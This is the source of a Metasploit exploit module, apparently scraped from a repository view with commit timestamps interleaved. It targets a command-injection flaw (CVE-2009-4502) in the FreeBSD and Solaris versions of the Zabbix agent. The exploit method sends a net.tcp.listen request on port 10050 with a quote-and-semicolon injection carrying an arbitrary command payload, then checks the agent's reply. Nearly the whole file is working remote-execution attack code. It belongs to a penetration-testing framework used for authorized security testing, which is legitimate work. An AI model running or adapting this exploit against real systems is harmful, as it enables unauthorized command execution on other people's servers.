metasploit-framework/modules/exploits/unix/misc/zabbix_agent_exec.rb

95 lines
2.4 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Tcp
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Zabbix Agent net.tcp.listen Command Injection',
'Description' => %q{
This module exploits a metacharacter injection vulnerability
in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
can only be exploited if the attacker can hijack the IP address
of an authorized server (as defined in the configuration file).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2009-4502' ],
[ 'OSVDB', '60956' ],
[ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'BadChars' => "'",
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 10 2009'))
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(10050)
], self.class)
end
2013-08-30 21:28:54 +00:00
def exploit
connect
2013-08-30 21:28:54 +00:00
rnd_port = rand(1024) + 1
buf = "net.tcp.listen[#{rnd_port}';#{payload.encoded};']\n"
2013-08-30 21:28:54 +00:00
print_status("Sending net.tcp.listen() request to the zabbix agent...")
sock.put(buf)
2013-08-30 21:28:54 +00:00
res = nil
begin
res = sock.get_once(-1, 5)
rescue ::EOFError
end
2013-08-30 21:28:54 +00:00
if ! res
print_status("The zabbix agent did not reply, our IP must not be in the allowed server list.")
disconnect
return
end
2013-08-30 21:28:54 +00:00
if (res =~ /ZBX_NOTSUPPORTED/)
print_status("The zabbix agent is not running a vulnerable version or operating system.")
disconnect
return
end
2013-08-30 21:28:54 +00:00
if(res !~ /ZBXD/)
print_status("The zabbix agent returned an unknown response.")
disconnect
return
end
2013-08-30 21:28:54 +00:00
print_status("The zabbix agent should have executed our command.")
disconnect
end
end